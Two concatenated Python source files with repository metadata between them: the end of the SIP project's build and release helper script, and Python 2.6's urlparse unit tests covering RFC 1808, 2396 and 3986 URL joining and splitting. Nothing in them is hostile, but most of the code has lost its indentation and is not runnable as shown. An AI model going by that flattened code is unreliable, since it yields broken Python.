version = (0, 1, 0)
major, minor, micro = version
if micro == 0:
version = '%d.%d' % (major, minor)
else:
version = '%d.%d.%d' % (major, minor, micro)
release = '%s%s' % (version, release_suffix)
hex_version = '%02x%02x%02x' % (major, minor, micro)
return release, version, hex_version, changelog
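# Illustrative sketch (not part of the original script): how a hypothetical
# release tuple is formatted into the version and hex-version strings, using
# the same rules as the tail of _get_release() above. The tuples below are
# made-up examples, not values read from any repository.
def _demo_format_release(version_tuple, suffix=''):
    major, minor, micro = version_tuple
    if micro == 0:
        version = '%d.%d' % (major, minor)
    else:
        version = '%d.%d.%d' % (major, minor, micro)
    return version + suffix, '%02x%02x%02x' % (major, minor, micro)
assert _demo_format_release((4, 13, 0)) == ('4.13', '040d00')
assert _demo_format_release((4, 13, 2)) == ('4.13.2', '040d02')
assert _demo_format_release((4, 14, 0), '-snapshot-0123456789ab')[0] == '4.14-snapshot-0123456789ab'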
def _progress(message, quiet):
""" Show a progress message to the user.
:param message:
The text of the message (without a newline).
:param quiet:
Set if progress messages should be suppressed.
"""
if not quiet:
sys.stdout.write(message)
sys.stdout.write("\n")
def _rooted_name(package, *path):
""" Convert a sequence of path components to a name below the root
directory.
:param package:
The name of the optional package directory.
:param \*path:
The sequence of path components.
:return:
The name.
"""
name = os.path.join(*path)
if package is not None:
name = os.path.join(package, name)
name = os.path.join(_RootDir, name)
return name
def _remove_file(name, quiet):
""" Remove a file, ignoring any errors.
:param name:
The name of the file.
:param quiet:
Set if progress messages should be suppressed.
"""
_progress("Removing %s" % name, quiet)
try:
os.remove(name)
except:
pass
def _create_directory(name, quiet):
""" Create a directory.
:param name:
The name of the directory.
:param quiet:
Set if progress messages should be suppressed.
"""
_progress("Creating directory %s" % name, quiet)
try:
os.mkdir(name)
except:
pass
def _remove_directory(name, quiet):
""" Remove a directory, ignoring any errors.
:param name:
The name of the directory.
:param quiet:
Set if progress messages should be suppressed.
"""
_progress("Removing directory %s" % name, quiet)
shutil.rmtree(name, ignore_errors=True)
def _patch_files(package, quiet, clean_patches):
""" Patch the required files to contain the correct version information.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
:param clean_patches:
Set if the original files should be removed after creating the patched
version.
"""
release, version, hex_version, _ = _get_release()
for f in _PatchedFiles:
dst_fn = _rooted_name(package, *f)
src_fn = dst_fn + '.in'
_progress("Patching %s" % dst_fn, quiet)
dst = open(dst_fn, 'w')
src = open(src_fn)
for line in src:
line = line.replace('@RM_RELEASE@', release)
line = line.replace('@RM_VERSION@', version)
line = line.replace('@RM_HEXVERSION@', hex_version)
dst.write(line)
dst.close()
src.close()
if clean_patches:
_remove_file(src_fn, quiet)
def _run_tools(package, quiet):
""" Run flex and bison. This should really be done from make but the SIP
build system doesn't support it - and it will be gone in SIP v5 anyway.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
"""
sipgen = _rooted_name(package, 'sipgen')
lexer = os.path.join(sipgen, 'lexer')
_progress("Running flex to create %s.c" % lexer, quiet)
os.system('flex -o%s.c %s.l' % (lexer, lexer))
parser = os.path.join(sipgen, 'parser')
_progress("Running bison to create %s.c" % parser, quiet)
os.system('bison -y -d -o %s.c %s.y' % (parser, parser))
def _run_sphinx(package=None, quiet=True, clean=False):
""" Run Sphinx to create the HTML documentation.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
:param clean:
Set if the .buildinfo file and .doctrees directory should be removed.
"""
sphinx = _rooted_name(package, 'sphinx')
doc = _rooted_name(package, 'doc')
html = os.path.join(doc, 'html')
if quiet:
qflag = ' -q'
else:
qflag = ''
_progress("Creating HTML documentation in %s" % html, quiet)
os.system('sphinx-build%s -b html %s %s' % (qflag, sphinx, html))
if clean:
_remove_file(os.path.join(html, '.buildinfo'), quiet)
_remove_directory(os.path.join(html, '.doctrees'), quiet)
def _prepare_root(package=None, quiet=True, clean_patches=False):
""" Prepare a directory.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
:param clean_patches:
Set if the original files should be removed after creating the patched
version.
"""
_patch_files(package, quiet, clean_patches)
_run_tools(package, quiet)
def _clean_root(package=None, quiet=True):
""" Clean up a directory.
:param package:
The name of the optional package directory.
:param quiet:
Set if progress messages should be suppressed.
"""
for f in _PatchedFiles:
_remove_file(_rooted_name(package, *f), quiet)
for f in _GeneratedFiles:
_remove_file(_rooted_name(package, *f), quiet)
root = _RootDir
if package is not None:
root = os.path.join(root, package)
for dirpath, dirnames, filenames in os.walk(root):
try:
dirnames.remove('.hg')
except ValueError:
pass
for f in filenames:
for ext in _GeneratedFileTypes:
if f.endswith(ext):
name = os.path.join(dirpath, f)
_remove_file(name, quiet)
for d in _GeneratedDirs:
_remove_directory(_rooted_name(package, *d), quiet)
def changelog(output, quiet=True):
""" The description of each change set going back to the last release are
written to a file object.
:param output:
The file object that the log is written to.
:param quiet:
Set if progress messages should be suppressed.
:return:
True if the log was written or False if the information wasn't
available (because this is a Mercurial archive).
"""
_, _, _, changelog = _get_release()
if changelog is None:
return False
output.write("\n\n".join(changelog) + "\n")
return True
def clean(quiet=True):
""" Clean by removing all files and directories not stored in the
repository.
:param quiet:
Set if progress messages should be suppressed.
"""
_clean_root(quiet=quiet)
release, _, _, _ = _get_release()
package = 'sip-' + release
_remove_directory(package, quiet)
def doc(quiet=True):
""" Create the documentation.
:param quiet:
Set if progress messages should be suppressed.
"""
_run_sphinx(quiet=quiet)
def prepare(quiet=True):
""" Prepare for configuration and building by creating all the required
additional files.
:param quiet:
Set if progress messages should be suppressed.
"""
_prepare_root(quiet=quiet)
def release(quiet=True):
""" Generate a set of release packages.
:param quiet:
Set if progress messages should be suppressed.
"""
release, _, _, _ = _get_release()
package = 'sip-' + release
_remove_directory(package, quiet)
_create_directory(package, quiet)
for f in _ReleasedFiles:
_progress("Adding file %s to release" % f, quiet)
shutil.copy2(f, package)
for d in _ReleasedDirs:
_progress("Adding directory %s to release" % d, quiet)
shutil.copytree(d, os.path.join(package, d))
_clean_root(package=package, quiet=quiet)
_prepare_root(package=package, quiet=quiet, clean_patches=True)
_run_sphinx(package=package, quiet=quiet, clean=True)
tar_package = package + '.tar.gz'
_progress("Creating package %s" % tar_package, quiet)
tf = tarfile.open(tar_package, 'w:gz')
tf.add(package)
tf.close()
zip_package = package + '.zip'
_progress("Creating package %s" % zip_package, quiet)
zf = zipfile.ZipFile(zip_package, 'w', zipfile.ZIP_DEFLATED)
for dirpath, dirnames, filenames in os.walk(package):
for f in filenames:
zf.write(os.path.join(dirpath, f))
zf.close()
def version(quiet=True):
""" Get the full version name of the package. If it is a release then it
will be of the form x.y[.z]. If it is a snapshot then it will be of the
    form x.y[.z]-snapshot-changeset where x.y[.z] is the version number of the
next release (not the previous one). If this is a Mercurial archive
(rather than a repository) then it does the best it can (based on the name
of the directory) with the limited information available.
:param quiet:
Set if progress messages should be suppressed.
:return:
The full version name.
"""
release, _, _, _ = _get_release()
return release
if __name__ == '__main__':
def _changelog(options):
"""get the changelog entries since the last release"""
if not changelog(sys.stdout, quiet=options.quiet):
sys.stderr.write("Unable to produce a changelog without a repository\n")
sys.exit(2)
def _clean(options):
"""remove all files not stored in the repository"""
clean(quiet=options.quiet)
def _doc(options):
"""create the documentation"""
doc(quiet=options.quiet)
def _prepare(options):
"""prepare for configuration and building"""
prepare(quiet=options.quiet)
def _release(options):
"""generate release packages"""
release(quiet=options.quiet)
def _version(options):
"""query the version of the package"""
sys.stdout.write(version(quiet=options.quiet) + "\n")
actions = (_changelog, _clean, _doc, _prepare, _release, _version)
import optparse
class MyParser(optparse.OptionParser):
def get_usage(self):
""" Reimplemented to add the description of the actions. We don't
use the description because the default formatter strips newlines.
"""
usage = optparse.OptionParser.get_usage(self)
usage += "\n" + __doc__ + "\nActions:\n"
for action in actions:
usage += " %-9s %s\n" % (action.func_name[1:], action.func_doc)
return usage
action_names = [action.func_name[1:] for action in actions]
rel, _, _, _ = _get_release()
parser = MyParser(
usage="%%prog [options] %s" % '|'.join(action_names), version=rel)
parser.add_option("-q", "--quiet", action='store_true', default=False,
dest='quiet', help="suppress progress messages")
options, args = parser.parse_args()
if len(args) != 1:
parser.print_help()
sys.exit(1)
for action in actions:
if action.func_name[1:] == args[0]:
action(options)
break
else:
parser.print_help()
sys.exit(1)
sys.exit()
|
MalloyPower/parsing-python
|
refs/heads/master
|
front-end/testsuite-python-lib/Python-2.6/Lib/test/test_urlparse.py
|
55
|
#! /usr/bin/env python
from test import test_support
import unittest
import urlparse
RFC1808_BASE = "http://a/b/c/d;p?q#f"
RFC2396_BASE = "http://a/b/c/d;p?q"
RFC3986_BASE = "http://a/b/c/d;p?q"
# A list of test cases. Each test case is a two-tuple that contains
# a query string and a list of (name, value) pairs with the expected result.
parse_qsl_test_cases = [
("", []),
("&", []),
("&&", []),
("=", [('', '')]),
("=a", [('', 'a')]),
("a", [('a', '')]),
("a=", [('a', '')]),
("a=", [('a', '')]),
("&a=b", [('a', 'b')]),
("a=a+b&b=b+c", [('a', 'a b'), ('b', 'b c')]),
("a=1&a=2", [('a', '1'), ('a', '2')]),
]
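# Illustrative sketch (not part of the original test file): one hypothetical
# call matching the table above; keep_blank_values=True is what preserves the
# blank-value cases such as ("a=", [('a', '')]).
assert urlparse.parse_qsl("a=a+b&b=b+c", keep_blank_values=True) == [('a', 'a b'), ('b', 'b c')]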
class UrlParseTestCase(unittest.TestCase):
def checkRoundtrips(self, url, parsed, split):
result = urlparse.urlparse(url)
self.assertEqual(result, parsed)
t = (result.scheme, result.netloc, result.path,
result.params, result.query, result.fragment)
self.assertEqual(t, parsed)
# put it back together and it should be the same
result2 = urlparse.urlunparse(result)
self.assertEqual(result2, url)
self.assertEqual(result2, result.geturl())
# the result of geturl() is a fixpoint; we can always parse it
# again to get the same result:
result3 = urlparse.urlparse(result.geturl())
self.assertEqual(result3.geturl(), result.geturl())
self.assertEqual(result3, result)
self.assertEqual(result3.scheme, result.scheme)
self.assertEqual(result3.netloc, result.netloc)
self.assertEqual(result3.path, result.path)
self.assertEqual(result3.params, result.params)
self.assertEqual(result3.query, result.query)
self.assertEqual(result3.fragment, result.fragment)
self.assertEqual(result3.username, result.username)
self.assertEqual(result3.password, result.password)
self.assertEqual(result3.hostname, result.hostname)
self.assertEqual(result3.port, result.port)
# check the roundtrip using urlsplit() as well
result = urlparse.urlsplit(url)
self.assertEqual(result, split)
t = (result.scheme, result.netloc, result.path,
result.query, result.fragment)
self.assertEqual(t, split)
result2 = urlparse.urlunsplit(result)
self.assertEqual(result2, url)
self.assertEqual(result2, result.geturl())
# check the fixpoint property of re-parsing the result of geturl()
result3 = urlparse.urlsplit(result.geturl())
self.assertEqual(result3.geturl(), result.geturl())
self.assertEqual(result3, result)
self.assertEqual(result3.scheme, result.scheme)
self.assertEqual(result3.netloc, result.netloc)
self.assertEqual(result3.path, result.path)
self.assertEqual(result3.query, result.query)
self.assertEqual(result3.fragment, result.fragment)
self.assertEqual(result3.username, result.username)
self.assertEqual(result3.password, result.password)
self.assertEqual(result3.hostname, result.hostname)
self.assertEqual(result3.port, result.port)
def test_qsl(self):
for orig, expect in parse_qsl_test_cases:
result = urlparse.parse_qsl(orig, keep_blank_values=True)
self.assertEqual(result, expect, "Error parsing %s" % repr(orig))
def test_roundtrips(self):
testcases = [
('file:///tmp/junk.txt',
('file', '', '/tmp/junk.txt', '', '', ''),
('file', '', '/tmp/junk.txt', '', '')),
('imap://mail.python.org/mbox1',
('imap', 'mail.python.org', '/mbox1', '', '', ''),
('imap', 'mail.python.org', '/mbox1', '', '')),
('mms://wms.sys.hinet.net/cts/Drama/09006251100.asf',
('mms', 'wms.sys.hinet.net', '/cts/Drama/09006251100.asf',
'', '', ''),
('mms', 'wms.sys.hinet.net', '/cts/Drama/09006251100.asf',
'', '')),
('svn+ssh://svn.zope.org/repos/main/ZConfig/trunk/',
('svn+ssh', 'svn.zope.org', '/repos/main/ZConfig/trunk/',
'', '', ''),
('svn+ssh', 'svn.zope.org', '/repos/main/ZConfig/trunk/',
'', ''))
]
for url, parsed, split in testcases:
self.checkRoundtrips(url, parsed, split)
def test_http_roundtrips(self):
# urlparse.urlsplit treats 'http:' as an optimized special case,
# so we test both 'http:' and 'https:' in all the following.
# Three cheers for white box knowledge!
testcases = [
('://www.python.org',
('www.python.org', '', '', '', ''),
('www.python.org', '', '', '')),
('://www.python.org#abc',
('www.python.org', '', '', '', 'abc'),
('www.python.org', '', '', 'abc')),
('://www.python.org?q=abc',
('www.python.org', '', '', 'q=abc', ''),
('www.python.org', '', 'q=abc', '')),
('://www.python.org/#abc',
('www.python.org', '/', '', '', 'abc'),
('www.python.org', '/', '', 'abc')),
('://a/b/c/d;p?q#f',
('a', '/b/c/d', 'p', 'q', 'f'),
('a', '/b/c/d;p', 'q', 'f')),
]
for scheme in ('http', 'https'):
for url, parsed, split in testcases:
url = scheme + url
parsed = (scheme,) + parsed
split = (scheme,) + split
self.checkRoundtrips(url, parsed, split)
def checkJoin(self, base, relurl, expected):
self.assertEqual(urlparse.urljoin(base, relurl), expected,
(base, relurl, expected))
def test_unparse_parse(self):
for u in ['Python', './Python']:
self.assertEqual(urlparse.urlunsplit(urlparse.urlsplit(u)), u)
self.assertEqual(urlparse.urlunparse(urlparse.urlparse(u)), u)
def test_RFC1808(self):
# "normal" cases from RFC 1808:
self.checkJoin(RFC1808_BASE, 'g:h', 'g:h')
self.checkJoin(RFC1808_BASE, 'g', 'http://a/b/c/g')
self.checkJoin(RFC1808_BASE, './g', 'http://a/b/c/g')
self.checkJoin(RFC1808_BASE, 'g/', 'http://a/b/c/g/')
self.checkJoin(RFC1808_BASE, '/g', 'http://a/g')
self.checkJoin(RFC1808_BASE, '//g', 'http://g')
self.checkJoin(RFC1808_BASE, 'g?y', 'http://a/b/c/g?y')
self.checkJoin(RFC1808_BASE, 'g?y/./x', 'http://a/b/c/g?y/./x')
self.checkJoin(RFC1808_BASE, '#s', 'http://a/b/c/d;p?q#s')
self.checkJoin(RFC1808_BASE, 'g#s', 'http://a/b/c/g#s')
self.checkJoin(RFC1808_BASE, 'g#s/./x', 'http://a/b/c/g#s/./x')
self.checkJoin(RFC1808_BASE, 'g?y#s', 'http://a/b/c/g?y#s')
self.checkJoin(RFC1808_BASE, 'g;x', 'http://a/b/c/g;x')
self.checkJoin(RFC1808_BASE, 'g;x?y#s', 'http://a/b/c/g;x?y#s')
self.checkJoin(RFC1808_BASE, '.', 'http://a/b/c/')
self.checkJoin(RFC1808_BASE, './', 'http://a/b/c/')
self.checkJoin(RFC1808_BASE, '..', 'http://a/b/')
self.checkJoin(RFC1808_BASE, '../', 'http://a/b/')
self.checkJoin(RFC1808_BASE, '../g', 'http://a/b/g')
self.checkJoin(RFC1808_BASE, '../..', 'http://a/')
self.checkJoin(RFC1808_BASE, '../../', 'http://a/')
self.checkJoin(RFC1808_BASE, '../../g', 'http://a/g')
# "abnormal" cases from RFC 1808:
self.checkJoin(RFC1808_BASE, '', 'http://a/b/c/d;p?q#f')
self.checkJoin(RFC1808_BASE, '../../../g', 'http://a/../g')
self.checkJoin(RFC1808_BASE, '../../../../g', 'http://a/../../g')
self.checkJoin(RFC1808_BASE, '/./g', 'http://a/./g')
self.checkJoin(RFC1808_BASE, '/../g', 'http://a/../g')
self.checkJoin(RFC1808_BASE, 'g.', 'http://a/b/c/g.')
self.checkJoin(RFC1808_BASE, '.g', 'http://a/b/c/.g')
self.checkJoin(RFC1808_BASE, 'g..', 'http://a/b/c/g..')
self.checkJoin(RFC1808_BASE, '..g', 'http://a/b/c/..g')
self.checkJoin(RFC1808_BASE, './../g', 'http://a/b/g')
self.checkJoin(RFC1808_BASE, './g/.', 'http://a/b/c/g/')
self.checkJoin(RFC1808_BASE, 'g/./h', 'http://a/b/c/g/h')
self.checkJoin(RFC1808_BASE, 'g/../h', 'http://a/b/c/h')
# RFC 1808 and RFC 1630 disagree on these (according to RFC 1808),
# so we'll not actually run these tests (which expect 1808 behavior).
#self.checkJoin(RFC1808_BASE, 'http:g', 'http:g')
#self.checkJoin(RFC1808_BASE, 'http:', 'http:')
def test_RFC2396(self):
# cases from RFC 2396
self.checkJoin(RFC2396_BASE, 'g:h', 'g:h')
self.checkJoin(RFC2396_BASE, 'g', 'http://a/b/c/g')
self.checkJoin(RFC2396_BASE, './g', 'http://a/b/c/g')
self.checkJoin(RFC2396_BASE, 'g/', 'http://a/b/c/g/')
self.checkJoin(RFC2396_BASE, '/g', 'http://a/g')
self.checkJoin(RFC2396_BASE, '//g', 'http://g')
self.checkJoin(RFC2396_BASE, 'g?y', 'http://a/b/c/g?y')
self.checkJoin(RFC2396_BASE, '#s', 'http://a/b/c/d;p?q#s')
self.checkJoin(RFC2396_BASE, 'g#s', 'http://a/b/c/g#s')
self.checkJoin(RFC2396_BASE, 'g?y#s', 'http://a/b/c/g?y#s')
self.checkJoin(RFC2396_BASE, 'g;x', 'http://a/b/c/g;x')
self.checkJoin(RFC2396_BASE, 'g;x?y#s', 'http://a/b/c/g;x?y#s')
self.checkJoin(RFC2396_BASE, '.', 'http://a/b/c/')
self.checkJoin(RFC2396_BASE, './', 'http://a/b/c/')
self.checkJoin(RFC2396_BASE, '..', 'http://a/b/')
self.checkJoin(RFC2396_BASE, '../', 'http://a/b/')
self.checkJoin(RFC2396_BASE, '../g', 'http://a/b/g')
self.checkJoin(RFC2396_BASE, '../..', 'http://a/')
self.checkJoin(RFC2396_BASE, '../../', 'http://a/')
self.checkJoin(RFC2396_BASE, '../../g', 'http://a/g')
self.checkJoin(RFC2396_BASE, '', RFC2396_BASE)
self.checkJoin(RFC2396_BASE, '../../../g', 'http://a/../g')
self.checkJoin(RFC2396_BASE, '../../../../g', 'http://a/../../g')
self.checkJoin(RFC2396_BASE, '/./g', 'http://a/./g')
self.checkJoin(RFC2396_BASE, '/../g', 'http://a/../g')
self.checkJoin(RFC2396_BASE, 'g.', 'http://a/b/c/g.')
self.checkJoin(RFC2396_BASE, '.g', 'http://a/b/c/.g')
self.checkJoin(RFC2396_BASE, 'g..', 'http://a/b/c/g..')
self.checkJoin(RFC2396_BASE, '..g', 'http://a/b/c/..g')
self.checkJoin(RFC2396_BASE, './../g', 'http://a/b/g')
self.checkJoin(RFC2396_BASE, './g/.', 'http://a/b/c/g/')
self.checkJoin(RFC2396_BASE, 'g/./h', 'http://a/b/c/g/h')
self.checkJoin(RFC2396_BASE, 'g/../h', 'http://a/b/c/h')
self.checkJoin(RFC2396_BASE, 'g;x=1/./y', 'http://a/b/c/g;x=1/y')
self.checkJoin(RFC2396_BASE, 'g;x=1/../y', 'http://a/b/c/y')
self.checkJoin(RFC2396_BASE, 'g?y/./x', 'http://a/b/c/g?y/./x')
self.checkJoin(RFC2396_BASE, 'g?y/../x', 'http://a/b/c/g?y/../x')
self.checkJoin(RFC2396_BASE, 'g#s/./x', 'http://a/b/c/g#s/./x')
self.checkJoin(RFC2396_BASE, 'g#s/../x', 'http://a/b/c/g#s/../x')
#The following scenarios have been updated in RFC3986
#self.checkJoin(RFC2396_BASE, '?y', 'http://a/b/c/?y')
#self.checkJoin(RFC2396_BASE, ';x', 'http://a/b/c/;x')
def test_RFC3986(self):
self.checkJoin(RFC3986_BASE, '?y','http://a/b/c/d;p?y')
self.checkJoin(RFC2396_BASE, ';x', 'http://a/b/c/;x')
def test_urldefrag(self):
for url, defrag, frag in [
('http://python.org#frag', 'http://python.org', 'frag'),
('http://python.org', 'http://python.org', ''),
('http://python.org/#frag', 'http://python.org/', 'frag'),
('http://python.org/', 'http://python.org/', ''),
('http://python.org/?q#frag', 'http://python.org/?q', 'frag'),
('http://python.org/?q', 'http://python.org/?q', ''),
('http://python.org/p#frag', 'http://python.org/p', 'frag'),
('http://python.org/p?q', 'http://python.org/p?q', ''),
(RFC1808_BASE, 'http://a/b/c/d;p?q', 'f'),
(RFC2396_BASE, 'http://a/b/c/d;p?q', ''),
]:
self.assertEqual(urlparse.urldefrag(url), (defrag, frag))
def test_urlsplit_attributes(self):
url = "HTTP://WWW.PYTHON.ORG/doc/#frag"
p = urlparse.urlsplit(url)
self.assertEqual(p.scheme, "http")
self.assertEqual(p.netloc, "WWW.PYTHON.ORG")
self.assertEqual(p.path, "/doc/")
self.assertEqual(p.query, "")
self.assertEqual(p.fragment, "frag")
self.assertEqual(p.username, None)
self.assertEqual(p.password, None)
self.assertEqual(p.hostname, "www.python.org")
self.assertEqual(p.port, None)
# geturl() won't return exactly the original URL in this case
# since the scheme is always case-normalized
#self.assertEqual(p.geturl(), url)
url = "http://User:Pass@www.python.org:080/doc/?query=yes#frag"
p = urlparse.urlsplit(url)
self.assertEqual(p.scheme, "http")
self.assertEqual(p.netloc, "User:Pass@www.python.org:080")
self.assertEqual(p.path, "/doc/")
self.assertEqual(p.query, "query=yes")
self.assertEqual(p.fragment, "frag")
self.assertEqual(p.username, "User")
self.assertEqual(p.password, "Pass")
self.assertEqual(p.hostname, "www.python.org")
self.assertEqual(p.port, 80)
self.assertEqual(p.geturl(), url)
# Addressing issue1698, which suggests Username can contain
# "@" characters. Though not RFC compliant, many ftp sites allow
# and request email addresses as usernames.
url = "http://User@example.com:Pass@www.python.org:080/doc/?query=yes#frag"
p = urlparse.urlsplit(url)
self.assertEqual(p.scheme, "http")
self.assertEqual(p.netloc, "User@example.com:Pass@www.python.org:080")
self.assertEqual(p.path, "/doc/")
self.assertEqual(p.query, "query=yes")
self.assertEqual(p.fragment, "frag")
self.assertEqual(p.username, "User@example.com")
self.assertEqual(p.password, "Pass")
self.assertEqual(p.hostname, "www.python.org")
self.assertEqual(p.port, 80)
self.assertEqual(p.geturl(), url)
def test_attributes_bad_port(self):
"""Check handling of non-integer ports."""
p = urlparse.urlsplit("http://www.example.net:foo")
self.assertEqual(p.netloc, "www.example.net:foo")
self.assertRaises(ValueError, lambda: p.port)
p = urlparse.urlparse("http://www.example.net:foo")
self.assertEqual(p.netloc, "www.example.net:foo")
self.assertRaises(ValueError, lambda: p.port)
def test_attributes_without_netloc(self):
# This example is straight from RFC 3261. It looks like it
# should allow the username, hostname, and port to be filled
# in, but doesn't. Since it's a URI and doesn't use the
# scheme://netloc syntax, the netloc and related attributes
# should be left empty.
uri = "sip:alice@atlanta.com;maddr=239.255.255.1;ttl=15"
p = urlparse.urlsplit(uri)
self.assertEqual(p.netloc, "")
self.assertEqual(p.username, None)
self.assertEqual(p.password, None)
self.assertEqual(p.hostname, None)
self.assertEqual(p.port, None)
self.assertEqual(p.geturl(), uri)
p = urlparse.urlparse(uri)
self.assertEqual(p.netloc, "")
self.assertEqual(p.username, None)
self.assertEqual(p.password, None)
self.assertEqual(p.hostname, None)
self.assertEqual(p.port, None)
self.assertEqual(p.geturl(), uri)
def test_caching(self):
# Test case for bug #1313119
uri = "http://example.com/doc/"
unicode_uri = unicode(uri)
urlparse.urlparse(unicode_uri)
p = urlparse.urlparse(uri)
self.assertEqual(type(p.scheme), type(uri))
self.assertEqual(type(p.hostname), type(uri))
self.assertEqual(type(p.path), type(uri))
def test_noslash(self):
# Issue 1637: http://foo.com?query is legal
self.assertEqual(urlparse.urlparse("http://example.com?blahblah=/foo"),
('http', 'example.com', '', '', 'blahblah=/foo', ''))
def test_main():
test_support.run_unittest(UrlParseTestCase)
if __name__ == "__main__":
test_main()
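# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original test file): the urlsplit()
# attributes checked in test_urlsplit_attributes, shown on one hypothetical
# URL. Runs under Python 2, where the urlparse module tested here lives.
def _demo_urlsplit_sketch():
    p = urlparse.urlsplit("http://User:Pass@www.python.org:080/doc/?query=yes#frag")
    assert (p.scheme, p.hostname, p.port) == ("http", "www.python.org", 80)
    assert (p.username, p.password) == ("User", "Pass")
    return p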
|